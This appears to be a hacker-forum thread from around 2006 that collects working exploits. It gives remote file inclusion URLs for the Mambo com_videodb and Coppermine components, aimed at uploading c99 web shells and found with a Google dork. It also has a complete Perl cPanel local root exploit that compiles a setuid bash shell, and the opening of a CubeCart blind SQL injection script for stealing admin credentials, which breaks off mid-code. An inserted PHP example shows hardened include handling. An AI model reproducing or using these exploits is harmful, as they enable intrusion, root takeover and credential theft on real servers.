com_videodb Mambo Component <= 0.3en Remote Include Vulnerability
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulnerability
download : http://mamboxchange.com/frs/download odb_v0.3en.zip
bug found in file : core/videodb.class.xml.php
global $mosConfig_absolute_path;
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );
exploit:
http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[shell]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all
#batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink
baby_hacker(HCE)
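As an added illustration (not code from the com_videodb component or from the post above), the include pattern the post quotes next to a hardened form that keeps request data out of the include path; the function names are hypothetical, and the `_VALID_MOS` guard is the standard Mambo direct-access check:

```php
<?php
// Added example, not part of the original post. Function names are hypothetical.

// The shape quoted in the post: with register_globals=On, a request parameter
// can populate $mosConfig_absolute_path, so the include target is attacker-chosen.
function load_domit_unsafe()
{
    global $mosConfig_absolute_path;
    require_once($mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php');
}

// Hardened form: refuse direct requests to the file, derive the include path
// from the file's own location, and verify it resolves inside the site root.
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

function load_domit_safe()
{
    // components/com_videodb/core/ is three directories below the site root.
    $root = realpath(dirname(dirname(dirname(dirname(__FILE__)))));
    $target = realpath($root . '/includes/domit/xml_domit_lite_include.php');

    // realpath() returns false for URLs and for paths that do not exist locally,
    // so a remote or missing target never reaches require_once().
    if ($root === false || $target === false || strpos($target, $root . DIRECTORY_SEPARATOR) !== 0) {
        die('Refusing to include an unexpected path');
    }
    require_once $target;
}

// Defensive check an administrator can run: both settings should be off.
function risky_php_settings()
{
    return array(
        'register_globals' => (bool) ini_get('register_globals'),
        'allow_url_fopen'  => (bool) ini_get('allow_url_fopen'),
    );
}
```

The guard and the path derivation remove the dependency on the global entirely; turning off register_globals at the php.ini level closes the same hole for every component at once.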
coppermine (nuke module) RFI vul
search google:
Code:
allinurl:modules.php?name=coppermine
xploit:
Code:
<server>/modules/coppermine/themes/default/theme.php?THEME_DIR=c99
<server>/modules/coppermine/include/init.inc.php?CPG_M_DIR=c99
Black_hat_cr(HCE)
cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit
- This one is nice
Quote:
#!/usr/bin/perl -w
# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin
# use strict; # haha oh wait
my $cpwrap = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap";
my $pwd = `pwd`;
chomp $pwd;
$ENV{'PERL5LIB'} = "$pwd";
if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; }
if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; }
if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; }
open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
while(<CPWRAP>) {
if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
}
close (CPWRAP);
open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print STRICT "system(\"/bin/chmod 4755 Maildir\");\n";
print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);
system("$mysqlwrap DUMPMYSQL 2>/dev/null");
if ( -e "Maildir" ) {
system("./Maildir");
}
else {
unlink "strict.pm";
die "Failed\n";
}
# milw0rm.com [2006-10-01]
navaro(HCE)
CubeCart <= 3.0.11 disclosure exploit
Bug name: CubeCart <= 3.0.11 "oid" blind SQL injection / admin credentials
Code:
#!/usr/bin/php -q -d short_open_tag=on
<?
print_r('
-
CubeCart <= 3.0.11 "oid" blind SQL injection / admin credentials
disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "Copyright Devellion Limited 2005 All rights reserved."
-> this works against MySQL >=4.1 (allowing subs)
-
');
/* short explanation:
software site: http://www.cubecart.com/site/home/
same kind of sql injection of http://retrogod.altervista.org/cubecart_3011_sql.html but this bypass magic_quotes_gpc=On because of base64_decode() function used
in
/modules/gateway/Protx/confirmed.php used near lines:
if($success == TRUE){
$cart_order_id = base64_decode($_GET['oid']);
include_once("../../../includes/orderSuccess.inc.php");
$result = "?pg=".base64_encode("Protx");
} else {
*/
if ($argc<3) {
print_r('
-
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to CubeCart
Options:
-T[prefix]: specify a table prefix different from default (CubeCart_)
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
-a adjust the first argument to pass to benchmark() function
-s: use sleep() (this function was added in MySQL 5.0.12.) instead of
benchmark()
-d disclose table prefix (recommended)
Example:
php '.$argv[0].' localhost /cubecart/
php '.$argv[0].' localhost /cubecart/ -a200000 -Tcube_
-
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" ";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} }
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy ';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {